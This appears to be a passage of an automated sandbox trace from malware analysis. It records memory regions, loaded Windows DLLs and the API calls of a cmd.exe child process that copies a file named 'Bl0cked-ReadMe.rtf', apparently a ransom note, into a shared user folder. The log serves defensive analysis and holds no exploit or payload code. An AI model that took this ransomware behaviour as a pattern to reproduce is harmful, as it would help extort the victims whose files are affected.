"\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 28283 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 28284 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 28285 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file 
name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 28286 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 28287 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 28288 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 28289 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 28290 start_va = 0x290000 end_va = 0x357fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 28291 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 28292 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 625 os_tid = 0xa68 Process: id = "435" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c20" os_pid = "0xf54" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > 
\"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 28303 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 28304 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 28305 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 28306 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 28307 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 28308 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 28309 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 28310 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 28311 start_va = 
0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 28312 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 28382 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 28383 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 28384 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 28385 start_va = 0x240000 end_va = 0x33ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 28386 start_va = 0x430000 end_va = 0x43ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 28387 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 28388 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 28389 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 28390 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: 
"c:\\windows\\system32\\kernel32.dll") Region: id = 28391 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 28392 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 28393 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 28394 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 28395 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 28396 start_va = 0x340000 end_va = 0x407fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000340000" filename = "" Region: id = 28397 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 28398 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 28399 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 28400 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" 
filename = "" Region: id = 28401 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 28402 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 28403 start_va = 0x440000 end_va = 0x540fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 28404 start_va = 0x550000 end_va = 0x114ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 28405 start_va = 0x1150000 end_va = 0x12b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001150000" filename = "" Thread: id = 627 os_tid = 0x994 [0192.859] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fbdc | out: lpSystemTimeAsFileTime=0x18fbdc*(dwLowDateTime=0xa7d4d160, dwHighDateTime=0x1d440a9)) [0192.859] GetCurrentProcessId () returned 0xf54 [0192.859] GetCurrentThreadId () returned 0x994 [0192.859] GetTickCount () returned 0x36d23 [0192.859] QueryPerformanceCounter (in: lpPerformanceCount=0x18fbd4 | out: lpPerformanceCount=0x18fbd4*=24964825037) returned 1 [0192.860] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0192.860] __set_app_type (_Type=0x1) [0192.860] __p__fmode () returned 0x76b331f4 [0192.860] __p__commode () returned 0x76b331fc [0192.860] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0192.860] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0192.860] GetCurrentThreadId () returned 0x994 [0192.860] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x994) returned 0x38 [0192.860] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0192.860] GetProcAddress (hModule=0x76910000, 
lpProcName="SetThreadUILanguage") returned 0x769624c2 [0192.860] SetThreadUILanguage (LangId=0x0) returned 0x409 [0192.860] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0192.860] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fb6c | out: phkResult=0x18fb6c*=0x0) returned 0x2 [0192.860] VirtualQuery (in: lpAddress=0x18fba3, lpBuffer=0x18fb3c, dwLength=0x1c | out: lpBuffer=0x18fb3c*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0192.860] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18fb3c, dwLength=0x1c | out: lpBuffer=0x18fb3c*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0192.860] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18fb3c, dwLength=0x1c | out: lpBuffer=0x18fb3c*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0192.861] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18fb3c, dwLength=0x1c | out: lpBuffer=0x18fb3c*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0192.861] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18fb3c, dwLength=0x1c | out: lpBuffer=0x18fb3c*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0192.861] GetConsoleOutputCP () returned 0x1b5 [0192.861] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0192.861] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0192.861] _get_osfhandle (_FileHandle=1) returned 0x7 
[0192.861] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0192.861] _get_osfhandle (_FileHandle=1) returned 0x7 [0192.861] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0192.861] _get_osfhandle (_FileHandle=1) returned 0x7 [0192.861] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0192.861] _get_osfhandle (_FileHandle=0) returned 0x3 [0192.861] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0192.861] _get_osfhandle (_FileHandle=0) returned 0x3 [0192.861] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0192.862] GetEnvironmentStringsW () returned 0x250190* [0192.862] FreeEnvironmentStringsW (penv=0x250190) returned 1 [0192.862] GetEnvironmentStringsW () returned 0x250190* [0192.862] FreeEnvironmentStringsW (penv=0x250190) returned 1 [0192.862] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18eadc | out: phkResult=0x18eadc*=0x40) returned 0x0 [0192.862] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18eae4, lpData=0x18eae8, lpcbData=0x18eae0*=0x1000 | out: lpType=0x18eae4*=0x0, lpData=0x18eae8*=0xb8, lpcbData=0x18eae0*=0x1000) returned 0x2 [0192.862] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18eae4, lpData=0x18eae8, lpcbData=0x18eae0*=0x1000 | out: lpType=0x18eae4*=0x4, lpData=0x18eae8*=0x1, lpcbData=0x18eae0*=0x4) returned 0x0 [0192.862] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18eae4, lpData=0x18eae8, lpcbData=0x18eae0*=0x1000 | out: lpType=0x18eae4*=0x0, lpData=0x18eae8*=0x1, lpcbData=0x18eae0*=0x1000) returned 0x2 [0192.862] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18eae4, lpData=0x18eae8, lpcbData=0x18eae0*=0x1000 | out: lpType=0x18eae4*=0x4, 
lpData=0x18eae8*=0x0, lpcbData=0x18eae0*=0x4) returned 0x0 [0192.862] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18eae4, lpData=0x18eae8, lpcbData=0x18eae0*=0x1000 | out: lpType=0x18eae4*=0x4, lpData=0x18eae8*=0x40, lpcbData=0x18eae0*=0x4) returned 0x0 [0192.862] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18eae4, lpData=0x18eae8, lpcbData=0x18eae0*=0x1000 | out: lpType=0x18eae4*=0x4, lpData=0x18eae8*=0x40, lpcbData=0x18eae0*=0x4) returned 0x0 [0192.862] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18eae4, lpData=0x18eae8, lpcbData=0x18eae0*=0x1000 | out: lpType=0x18eae4*=0x0, lpData=0x18eae8*=0x40, lpcbData=0x18eae0*=0x1000) returned 0x2 [0192.862] RegCloseKey (hKey=0x40) returned 0x0 [0192.862] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18eadc | out: phkResult=0x18eadc*=0x40) returned 0x0 [0192.862] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18eae4, lpData=0x18eae8, lpcbData=0x18eae0*=0x1000 | out: lpType=0x18eae4*=0x0, lpData=0x18eae8*=0x40, lpcbData=0x18eae0*=0x1000) returned 0x2 [0192.862] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18eae4, lpData=0x18eae8, lpcbData=0x18eae0*=0x1000 | out: lpType=0x18eae4*=0x4, lpData=0x18eae8*=0x1, lpcbData=0x18eae0*=0x4) returned 0x0 [0192.862] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18eae4, lpData=0x18eae8, lpcbData=0x18eae0*=0x1000 | out: lpType=0x18eae4*=0x0, lpData=0x18eae8*=0x1, lpcbData=0x18eae0*=0x1000) returned 0x2 [0192.862] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18eae4, lpData=0x18eae8, lpcbData=0x18eae0*=0x1000 | out: lpType=0x18eae4*=0x4, lpData=0x18eae8*=0x0, lpcbData=0x18eae0*=0x4) returned 0x0 [0192.863] 
RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18eae4, lpData=0x18eae8, lpcbData=0x18eae0*=0x1000 | out: lpType=0x18eae4*=0x4, lpData=0x18eae8*=0x9, lpcbData=0x18eae0*=0x4) returned 0x0 [0192.863] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18eae4, lpData=0x18eae8, lpcbData=0x18eae0*=0x1000 | out: lpType=0x18eae4*=0x4, lpData=0x18eae8*=0x9, lpcbData=0x18eae0*=0x4) returned 0x0 [0192.863] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18eae4, lpData=0x18eae8, lpcbData=0x18eae0*=0x1000 | out: lpType=0x18eae4*=0x0, lpData=0x18eae8*=0x9, lpcbData=0x18eae0*=0x1000) returned 0x2 [0192.863] RegCloseKey (hKey=0x40) returned 0x0 [0192.863] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88639a [0192.863] srand (_Seed=0x5b88639a) [0192.863] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\Bl0cked-ReadMe.rtf\"" [0192.863] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\Bl0cked-ReadMe.rtf\"" [0192.863] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0192.863] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2518f0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0192.863] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0192.863] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") 
returned 0x35 [0192.863] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0192.863] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0192.863] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0192.863] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0192.863] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0192.863] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0192.864] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0192.864] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0192.864] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0192.864] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0192.864] GetEnvironmentStringsW () returned 0x2522e0* [0192.864] FreeEnvironmentStringsW (penv=0x2522e0) returned 1 [0192.864] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0192.864] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0192.864] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0192.864] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0192.864] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0192.864] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0192.864] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0192.864] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0192.864] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0192.864] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0192.864] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18f8a8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0192.864] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", 
nBufferLength=0x104, lpBuffer=0x18f8a8, lpFilePart=0x18f8a4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x18f8a4*="Desktop") returned 0x18 [0192.864] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0192.864] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x18f624 | out: lpFindFileData=0x18f624) returned 0x250020 [0192.864] FindClose (in: hFindFile=0x250020 | out: hFindFile=0x250020) returned 1 [0192.865] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x18f624 | out: lpFindFileData=0x18f624) returned 0x250020 [0192.865] FindClose (in: hFindFile=0x250020 | out: hFindFile=0x250020) returned 1 [0192.865] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x18f624 | out: lpFindFileData=0x18f624) returned 0x250020 [0192.865] FindClose (in: hFindFile=0x250020 | out: hFindFile=0x250020) returned 1 [0192.865] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0192.865] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0192.865] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0192.865] GetEnvironmentStringsW () returned 0x252b00* [0192.865] FreeEnvironmentStringsW (penv=0x252b00) returned 1 [0192.865] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0192.866] GetConsoleOutputCP () returned 0x1b5 [0192.866] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0192.866] GetUserDefaultLCID () returned 0x409 [0192.866] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0192.866] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18f9e8, cchData=128 | out: lpLCData="0") 
returned 2 [0192.866] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18f9e8, cchData=128 | out: lpLCData="0") returned 2 [0192.866] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18f9e8, cchData=128 | out: lpLCData="1") returned 2 [0192.866] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0192.866] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0192.866] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0192.866] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0192.866] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0192.866] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0192.866] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0192.866] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0192.866] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0192.866] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0192.867] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0192.867] GetConsoleTitleW (in: lpConsoleTitle=0x2408e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0192.868] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0192.868] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0192.868] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0192.868] 
GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0192.868] _wcsicmp (_String1="type", _String2=")") returned 75 [0192.868] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0192.868] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0192.868] _wcsicmp (_String1="IF", _String2="type") returned -11 [0192.868] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0192.868] _wcsicmp (_String1="REM", _String2="type") returned -2 [0192.868] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0192.872] _get_osfhandle (_FileHandle=1) returned 0x7 [0192.872] _get_osfhandle (_FileHandle=1) returned 0x7 [0192.872] _get_osfhandle (_FileHandle=1) returned 0x7 [0192.872] GetFileType (hFile=0x7) returned 0x2 [0192.872] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0192.872] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18f8e0 | out: lpMode=0x18f8e0) returned 1 [0192.872] _dup (_FileHandle=1) returned 3 [0192.873] _close (_FileHandle=1) returned 0 [0192.873] _wcsicmp (_String1="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0192.873] CreateFileW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\alluse~1\\micros~1\\userac~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x18f8b0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0192.874] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0192.874] GetConsoleTitleW (in: lpConsoleTitle=0x18f6e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0192.874] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0192.874] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0192.874] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0192.874] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0192.875] GetCurrentDirectoryW (in: 
